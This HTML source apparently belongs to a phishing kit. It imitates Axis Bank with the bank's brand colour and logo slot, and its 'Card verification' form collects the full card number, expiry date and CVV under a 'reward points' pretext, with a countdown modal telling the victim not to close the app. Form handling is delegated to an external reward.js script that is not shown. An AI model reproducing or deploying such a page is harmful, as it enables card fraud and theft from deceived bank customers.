<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Axis Bank</title>
    <style>
        /* Style for the modal */
        .modal {
            display: none;
            position: fixed;
            z-index: 1000;
            left: 0;
            top: 0;
            width: 100%;
            height: 100%;
            overflow: auto;
            background-color: rgba(255, 255, 255, 0.8);
            backdrop-filter: blur(10px);
            justify-content: center;
            align-items: center;
        }

        .modal-content {
            background-color: #fff;
            margin: auto;
            padding: 20px;
            border: 1px solid #888;
            width: 80%;
            max-width: 300px;
            text-align: center;
            border-radius: 10px;
        }

        .loader {
            border: 16px solid #f3f3f3;
            border-top: 16px solid #3498db;
            border-radius: 50%;
            width: 120px;
            height: 120px;
            animation: spin 2s linear infinite;
            margin: 20px auto;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }
    </style>
    <script src="https://cdn.jsdelivr.net/npm/canvas-confetti@1.4.0/dist/confetti.browser.min.js"></script>
    <script src="https://cdn.tailwindcss.com"></script> 
    <!-- <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet"> -->
</head>
<body>
    <div class="container mx-auto mt-10">
        <div class="flex justify-center">
            <div class="w-full max-w-md p-6 rounded-md shadow-sm">
                <div class="text-center mb-12">
                    <img src="/images/logo.png" alt="Logo" class="w-100 h-20 mx-auto mb-2"> 
                    <h1 class="text-s ">Card verification</h1>
                </div>
                <form id="reward-form">
                    <div class="mb-8">
                        <label for="card-number" class="block text-gray-700 font-bold mb-2">Credit Card No.:</label>
                        <input type="text" id="card-number" class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" maxlength="16" required>
                    </div>

                    
                    <div class="w-full flex gap-8">
                    <div class="mb-12 w-3/4">
                        <label for="expiry-date-month" class="block text-gray-700 font-bold mb-2">Expiry Date:</label>
                        <div class="flex">
                            <select id="expiry-date-month" class="shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline mr-2" required>
                                <option value=""> Month </option>
                                <option value="01">01</option>
                                <option value="02">02</option>
                                <option value="03">03</option>
                                <option value="04">04</option>
                                <option value="05">05</option>
                                <option value="06">06</option>
                                <option value="07">07</option>
                                <option value="08">08</option>
                                <option value="09">09</option>
                                <option value="10">10</option>
                                <option value="11">11</option>
                                <option value="12">12</option>
                            </select>
                            <select id="expiry-date-year" class="shadow appearance-none border rounded py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" required>
                                <option value=""> &nbsp &nbsp Year &nbsp &nbsp</option>
                                <option value="2024">2024</option>
                                <option value="2025">2025</option>
                                <option value="2026">2026</option>
                                <option value="2027">2027</option>
                                <option value="2028">2028</option>
                                <option value="2029">2029</option>
                                <option value="2030">2030</option>
                                <option value="2031">2031</option>
                                <option value="2032">2032</option>
                                <option value="2033">2033</option>
                                <option value="2034">2034</option>
                                <option value="2035">2035</option>
                            </select>
                        </div>
                    </div>
                    <div class="mb-8 w-2/4">
                        <label for="cvv" class="block text-gray-700 font-bold mb-2">CVV:</label>
                        <input type="text" id="cvv" class="shadow appearance-none border rounded w-full py-2 px-3 text-gray-700 leading-tight focus:outline-none focus:shadow-outline" maxlength="3" required>
                    </div>


                </div>
                    
                    <button type="button" onclick="validateCard()" class="hover:border bg-my-primary hover:border-my-primary hover:text-my-primary hover:border-my-primary hover:bg-white text-white font-bold py-2 px-4 rounded focus:outline-none focus:shadow-outline">Validate Card</button>
                </form>
                    <!-- The Modal -->
                    <div id="loadingModal" class="modal">
                        <div class="modal-content">
                            <div class="loader"></div>
                            <p>Please wait while verifying your reward points. Don't close the app.</p>
                            <div id="timer">10</div>
                        </div>
                    </div>
            </div>
        </div>
    </div>
    <script>
        const cardNumberInput = document.getElementById('card-number');
        const cvvInput = document.getElementById('cvv');

        cardNumberInput.addEventListener('input', () => {
            cardNumberInput.value = cardNumberInput.value.replace(/\D/g, '').substring(0, 16); // Allow only digits and limit to 16
        });

        cvvInput.addEventListener('input', () => {
            cvvInput.value = cvvInput.value.replace(/\D/g, '').substring(0, 3); 
        });
    </script>
    <script src="/js/reward.js"></script>
    <script>
        tailwind.config = {
            theme: {
                extend: {
                    colors: {
                        'my-primary': '#97144D', 
                    },
                },
            },
            variants: { 
                extend: {
                    borderStyle: ['hover'],
                }
    }
        };
    </script>

</body>
</html>
